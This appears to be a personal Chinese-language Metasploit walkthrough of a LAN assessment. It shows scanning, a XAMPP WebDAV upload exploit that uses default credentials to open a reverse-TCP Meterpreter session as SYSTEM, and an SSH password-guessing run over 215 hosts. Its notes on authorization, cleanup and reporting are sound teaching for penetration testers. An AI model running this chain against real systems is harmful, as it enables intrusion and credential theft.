作者:Scanz
更新版本:V1(20180428初版,待更新格式)
个人使用记录
----------------------------------------------
~# /etc/init.d/postgresql start
~# msfdb init
注: msfdb init 只在首次使用时执行一次(创建数据库和数据库配置); 之后每次启动只需 msfdb start。db_status 显示 "connected" 才说明后面的 hosts/services/-R 会真正写入数据库。
~# msfconsole
msf > db_status
[*] postgresql connected to msf
msf > load nessus
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus
msf > nessus_connect 'user':'passwd'@127.0.0.1:8834
[*] Connecting to https://127.0.0.1:8834/ as user
[*] User user authenticated successfully
注: 这里的账号/口令是以明文在命令行输入的, 会被写进 msfconsole 的命令历史(~/.msf4/history)。建议为插件单独建一个最低权限的 Nessus 扫描账号, 用完后清理历史记录。扫描器不在本机(不是 127.0.0.1)时, 先看 nessus_help 里关于证书校验的参数, 不要无条件信任自签名证书。
主机发现(二层): use auxiliary/scanner/discovery/arp_sweep
注: arp_sweep 依靠 ARP 请求, 只能发现与攻击机处于同一广播域的主机, 需要设置 RHOSTS 并以 root 运行(原始套接字); 跨网段的发现仍要用 db_nmap。
root@kali:~# apt-cache show metasploit-framework | tail -n 6
Description: Framework for exploit development and vulnerability research
 The Metasploit Framework is an open source platform that supports vulnerability research, exploit development, and the creation of custom security tools.
Description-md5: c5f73085c4e31aa2cc01dd312ce844cc
root@kali:~#
root@kali:~# msfconsole
msf > workspace -a msftest
[*] Added workspace: msftest
msf > db_nmap -F 192.168.0.1-10
注: 每个目标/项目单独开一个 workspace, 后续 hosts/services/creds 都只落在当前 workspace 里, 便于隔离和清理。nmap 的 -F 只扫描最常见的 100 个端口, 所以下面 services 列出的端口并不完整; 正式评估要补一次全端口(-p-)或至少默认 1000 端口的扫描。
msf > hosts

Hosts
=====

address      mac                name     os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----     -------  ---------  -----  -------  ----  --------
192.168.0.1  80:c6:ca:00:bf:e8           Unknown                    device
192.168.0.2  84:1b:5e:e5:66:ae           Unknown                    device
192.168.0.3  84:16:f9:9a:82:51           Unknown                    device
192.168.0.6  00:0c:29:2b:61:e1           Unknown                    device
192.168.0.7  b8:27:eb:89:ac:c3  pi-hole  Unknown                    device
192.168.0.8  0c:51:01:e1:8d:27           Unknown                    device
192.168.0.9  78:ca:39:fe:0b:4c           Unknown                    device

msf > services

Services
========

host         port  proto  name           state   info
----         ----  -----  ----           -----   ----
192.168.0.1  22    tcp    ssh            open
192.168.0.1  53    tcp    domain         open
192.168.0.1  80    tcp    http           open
192.168.0.1  3000  tcp    ppp            closed
192.168.0.1  8080  tcp    http-proxy     closed
192.168.0.2  80    tcp    http           open
192.168.0.2  443   tcp    https          open
192.168.0.2  5000  tcp    upnp           open
192.168.0.3  80    tcp    http           open
192.168.0.6  21    tcp    ftp            open
192.168.0.6  80    tcp    http           open
192.168.0.6  135   tcp    msrpc          open
192.168.0.6  139   tcp    netbios-ssn    open
192.168.0.6  443   tcp    https          open
192.168.0.6  445   tcp    microsoft-ds   open
192.168.0.6  554   tcp    rtsp           open
192.168.0.6  3389  tcp    ms-wbt-server  open

注: 此时 name 列只是 nmap 按端口号猜的服务名, info 列为空; 真正的版本/指纹要靠后面的 *_version 模块回填。closed 的条目(3000/8080)也会入库, 用 services -u 可只看 open 的。
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe

msf auxiliary(ssh_version) > services -u -p 22 -R

Services
========

host         port  proto  name  state  info
----         ----  -----  ----  -----  ----
192.168.0.1  22    tcp    ssh   open
192.168.0.7  22    tcp    ssh   open

RHOSTS => 192.168.0.1 192.168.0.7
注: services -u -p 22 -R = 只取 open 的 22 端口, 并把对应主机直接写入当前模块的 RHOSTS, 省去手工拼 IP 列表。
msf auxiliary(ssh_version) > setg threads 10
threads => 10
msf auxiliary(ssh_version) > run

[*] 192.168.0.7:22 - SSH server version: SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3 ( service.version=6.7p1 openssh.comment=Raspbian-5+deb8u3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Raspbian os.device=General os.family=Linux os.product=Linux os.version=8.0 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1:22 - SSH server version: SSH-2.0-OpenSSH_3.9p1 ( service.version=3.9p1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
[*] Scanned 1 of 2 hosts (50% complete)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
注: setg 是全局设置, 之后切换到的每个模块 THREADS 都会是 10。这里的版本全部来自 banner(fingerprint_db=ssh.banner): 发行版会回传补丁(如 Raspbian-5+deb8u3), banner 也可被改写, 所以"版本号对得上"不等于"漏洞存在", 只能当作待验证的线索。192.168.0.1 报的 OpenSSH_3.9p1 非常老, 更像是嵌入式设备固件, 同样需要先确认再下结论。
msf auxiliary(ssh_version) > use auxiliary/scanner/http/http_version
msf auxiliary(http_version) > options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  10               yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(http_version) > services -u -p 80 -R

Services
========

host         port  proto  name  state  info
----         ----  -----  ----  -----  ----
192.168.0.1  80    tcp    http  open
192.168.0.2  80    tcp    http  open
192.168.0.3  80    tcp    http  open
192.168.0.6  80    tcp    http  open
192.168.0.7  80    tcp    http  open

RHOSTS => 192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.6 192.168.0.7
msf auxiliary(http_version) > run

[*] 192.168.0.7:80 lighttpd/1.4.35 ( Debian Default Page )
[*] 192.168.0.2:80 ( 401-Basic realm="NETGEAR R6200" )
[*] 192.168.0.6:80 Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ )
[*] 192.168.0.1:80 Apache ( 302-https://192.168.0.1:10443/manage/dashboard )
[*] Scanned 4 of 5 hosts (80% complete)
[*] 192.168.0.3:80 Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" )
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
注: 192.168.0.2 和 .3 的管理界面在 80 端口用 HTTP Basic 认证(401-Basic), 口令在局域网内明文传输, 本身就是一个发现项。192.168.0.6 的 Server 头暴露了 Apache/2.4.3、OpenSSL/1.0.1c、PHP/5.4.7 这些 2012 年左右的组件版本并重定向到 /xampp/, 说明是 XAMPP 默认安装; 记录下这些版本串, 后面定向查模块。对 443 的目标要另外跑一次 SSL=true, RPORT=443。
msf auxiliary(http_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    10               yes       The number of concurrent threads

msf auxiliary(smb_version) > services -u -p 445 -R

Services
========

host         port  proto  name          state  info
----         ----  -----  ----          -----  ----
192.168.0.6  445   tcp    microsoft-ds  open
192.168.0.8  445   tcp    microsoft-ds  open
192.168.0.9  445   tcp    microsoft-ds  open

RHOSTS => 192.168.0.6 192.168.0.8 192.168.0.9
msf auxiliary(smb_version) > run

[*] 192.168.0.6:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP )
[*] 192.168.0.9:445 - Host could not be identified: Apple Base Station (CIFS 4.32)
[*] 192.168.0.8:445 - Host could not be identified: Apple Base Station (CIFS 4.32)
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) > clear
注: SMBUser/SMBPass 留空, 这是一次未认证的探测, 目标没有开启 SMB 签名/限制匿名协商时就能拿到 OS 和主机名。指纹只给出版本和 build(7601), 不代表补丁级别, 不能据此直接认定某个 SMB 漏洞存在。clear 只是清屏。
msf auxiliary(smb_version) > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.0.1 80:c6:ca:00:bf:e8 192.168.0.1 Unknown device 192.168.0.2 84:1b:5e:e5:66:ae 192.168.0.2 Unknown device 192.168.0.3 84:16:f9:9a:82:51 192.168.0.3 RE200 router 192.168.0.6 00:0c:29:2b:61:e1 WIN7-X86 Windows device 192.168.0.7 b8:27:eb:89:ac:c3 pi-hole Linux 8.0 server 192.168.0.8 0c:51:01:e1:8d:27 Unknown device 192.168.0.9 78:ca:39:fe:0b:4c Unknown device msf auxiliary(smb_version) > services -u Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.1 22 tcp ssh open SSH-2.0-OpenSSH_3.9p1 192.168.0.1 53 tcp domain open 192.168.0.1 80 tcp http open Apache ( 302-https://192.168.0.1:10443/manage/dashboard ) 192.168.0.2 80 tcp http open ( 401-Basic realm="NETGEAR R6200" ) 192.168.0.2 443 tcp https open 192.168.0.2 5000 tcp upnp open 192.168.0.3 80 tcp http open Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" ) 192.168.0.6 21 tcp ftp open 192.168.0.6 80 tcp http open Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ ) 192.168.0.6 135 tcp msrpc open 192.168.0.6 139 tcp netbios-ssn open 192.168.0.6 443 tcp https open 192.168.0.6 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP ) 192.168.0.6 554 tcp rtsp open 192.168.0.6 3389 tcp ms-wbt-server open 192.168.0.6 5357 tcp wsdapi open 192.168.0.6 49155 tcp unknown open 192.168.0.6 49156 tcp unknown open 192.168.0.7 22 tcp ssh open SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3 192.168.0.7 53 tcp domain open 192.168.0.7 80 tcp http open lighttpd/1.4.35 ( Debian Default Page ) 192.168.0.8 139 tcp netbios-ssn open 192.168.0.8 445 tcp smb open Apple Base Station (CIFS 4.32) 192.168.0.8 548 tcp afp open 192.168.0.8 5009 tcp airport-admin open 192.168.0.8 10000 tcp snet-sensor-mgmt open 192.168.0.9 139 
tcp netbios-ssn open 192.168.0.9 445 tcp smb open Apple Base Station (CIFS 4.32) 192.168.0.9 548 tcp afp open 192.168.0.9 5009 tcp airport-admin open 192.168.0.9 10000 tcp snet-sensor-mgmt open
msf auxiliary(smb_version) > services 192.168.0.6 Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 192.168.0.6 21 tcp ftp open 192.168.0.6 80 tcp http open Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ ) 192.168.0.6 135 tcp msrpc open 192.168.0.6 139 tcp netbios-ssn open 192.168.0.6 443 tcp https open 192.168.0.6 445 tcp smb open Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP ) 192.168.0.6 554 tcp rtsp open 192.168.0.6 3389 tcp ms-wbt-server open 192.168.0.6 5357 tcp wsdapi open 192.168.0.6 49155 tcp unknown open 192.168.0.6 49156 tcp unknown open
msf auxiliary(smb_version) > search xampp

[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                          Disclosure Date  Rank       Description
   ----                                          ---------------  ----       -----------
   exploit/windows/http/xampp_webdav_upload_php  2012-01-14       excellent  XAMPP WebDAV PHP Upload

msf auxiliary(smb_version) > use exploit/windows/http/xampp_webdav_upload_php
msf exploit(xampp_webdav_upload_php) > options

Module options (exploit/windows/http/xampp_webdav_upload_php):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
   PASSWORD  xampp            no        The HTTP password to specify for authentication
   PATH      /webdav/         yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  wampp            no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(xampp_webdav_upload_php) > set rhost 192.168.0.6
rhost => 192.168.0.6
注: 这个模块利用的不是内存漏洞, 而是 XAMPP 默认开启的 /webdav/ 加上默认口令 wampp/xampp(看 USERNAME/PASSWORD 的默认值), 通过 WebDAV PUT 上传一个 .php 再访问它执行。修复措施相应地是删除/关闭 WebDAV 目录或改掉默认口令; 报告里应把它归为默认凭据/配置问题。"Module database cache not built yet" 只影响 search 速度, 当时版本可用 db_rebuild_cache 解决。
msf exploit(xampp_webdav_upload_php) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline php/bind_perl normal PHP Command Shell, Bind TCP (via Perl) php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6 php/bind_php normal PHP Command Shell, Bind TCP (via PHP) php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6 php/download_exec normal PHP Executable Download and Execute php/exec normal PHP Execute Command php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager php/meterpreter/bind_tcp_ipv6 normal PHP Meterpreter, Bind TCP Stager IPv6 php/meterpreter/bind_tcp_ipv6_uuid normal PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support php/meterpreter/bind_tcp_uuid normal PHP Meterpreter, Bind TCP Stager with UUID Support php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP Stager php/meterpreter/reverse_tcp_uuid normal PHP Meterpreter, PHP Reverse TCP Stager php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline php/reverse_perl normal PHP Command, Double Reverse TCP Connection (via Perl) php/reverse_php normal PHP Command Shell, Reverse TCP (via PHP)
msf exploit(xampp_webdav_upload_php) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(xampp_webdav_upload_php) > options Module options (exploit/windows/http/xampp_webdav_upload_php): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME no The filename to give the payload. (Leave Blank for Random) PASSWORD xampp no The HTTP password to specify for authentication PATH /webdav/ yes The path to attempt to upload Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.0.6 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections USERNAME wampp no The HTTP username to specify for authentication VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
msf exploit(xampp_webdav_upload_php) > set lhost 192.168.0.15
lhost => 192.168.0.15
msf exploit(xampp_webdav_upload_php) > exploit

[*] Started reverse TCP handler on 192.168.0.15:4444
[*] Uploading Payload to /webdav/3vfkVff.php
[*] Attempting to execute Payload
[*] Sending stage (33986 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.15:4444 -> 192.168.0.6:51211) at 2017-05-03 17:32:59 -0600
注: LHOST 必须是目标能回连到的攻击机地址(reverse_tcp 是目标主动连 192.168.0.15:4444, 中间有 NAT/防火墙就收不到会话)。注意输出里上传的 /webdav/3vfkVff.php 是留在目标上的 web shell, 会话结束后要确认它已被删除, 没删就手工清理, 否则等于给目标留了后门。
meterpreter > ps

 304  taskeng.exe        NT AUTHORITY\SYSTEM           taskeng.exe
 348  csrss.exe          NT AUTHORITY\SYSTEM           csrss.exe
 388  wininit.exe        NT AUTHORITY\SYSTEM           wininit.exe
 400  csrss.exe          NT AUTHORITY\SYSTEM           csrss.exe
 448  winlogon.exe       NT AUTHORITY\SYSTEM           winlogon.exe
 496  services.exe       NT AUTHORITY\SYSTEM           services.exe
 504  lsass.exe          NT AUTHORITY\SYSTEM           lsass.exe
 512  lsm.exe            NT AUTHORITY\SYSTEM           lsm.exe
 612  svchost.exe        NT AUTHORITY\SYSTEM           svchost.exe
 628  xampp-control.exe  WIN7-X86\victim               xampp-control.exe
 676  vmacthlp.exe       NT AUTHORITY\SYSTEM           vmacthlp.exe
 708  svchost.exe        NT AUTHORITY\NETWORK SERVICE  svchost.exe
 760  svchost.exe        NT AUTHORITY\LOCAL SERVICE    svchost.exe
 820  LogonUI.exe        NT AUTHORITY\SYSTEM           LogonUI.exe
 856  svchost.exe        NT AUTHORITY\SYSTEM           svchost.exe
 896  svchost.exe        NT AUTHORITY\LOCAL SERVICE    svchost.exe
(进程列表在原文中被截断, 后面的进程未显示)

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    : WIN7-X86
OS          : Windows NT WIN7-X86 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.6 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(xampp_webdav_upload_php) > exit
root@kali:~# # excellent :)
root@kali:~#
注: php/meterpreter 跑在 web 服务器进程里, 权限就是 Apache 进程的权限; 这里 getuid 直接是 SYSTEM, 说明目标上的 Apache 大概率是以 SYSTEM 账号跑的 Windows 服务(截断的 ps 列表里看不到 httpd 进程, 无法从此页确认)。这本身也是一个发现: web 服务不应以 SYSTEM 运行。php 版 meterpreter 功能比 native 版少, 需要更多操作时可再迁移/升级。
RHOSTS file:/tmp/msf-db-rhosts-20171109-128530-1v0kofq
注: 新版本里 hosts/services 的 -R 不再把 IP 列表直接拼进 RHOSTS, 而是写到 /tmp 下的临时文件, 再把 RHOSTS 设成 file:<路径>; 该文件在 /tmp, 重启或清理后就没了。
RHOSTS 也可以手动指定目标文件: file:<绝对路径>, 文件里一行一个 IP(下面 file:///opt/pass/ip 的写法同样被接受)。
msf auxiliary(scanner/ssh/ssh_login) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
注: 这个报错表示 RHOSTS 没通过校验, 常见原因是 RHOSTS 为空, 或者指向的 file: 临时文件已不存在; 用 options 看一眼当前值再重新 set。
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS file:///opt/pass/ip
RHOSTS => file:///opt/pass/ip
msf auxiliary(scanner/ssh/ssh_login) > run
注: ssh_login 是口令猜测(爆破)模块, 需要另外配置 USERNAME/PASSWORD 或 USER_FILE/PASS_FILE/USERPASS_FILE(本页未展示)。对 215 台主机跑这种扫描前要确认授权范围, 并注意目标可能有账号锁定和告警; 猜中的凭据会写入数据库的 creds 表并尝试建立会话。
[*] Scanned 22 of 215 hosts (10% complete)
[*] Scanned 45 of 215 hosts (20% complete)
[*] Scanned 65 of 215 hosts (30% complete)
[*] Scanned 87 of 215 hosts (40% complete)
[*] Scanned 109 of 215 hosts (50% complete)
[*] Scanned 129 of 215 hosts (60% complete)
[*] Scanned 152 of 215 hosts (70% complete)
[*] Scanned 173 of 215 hosts (80% complete)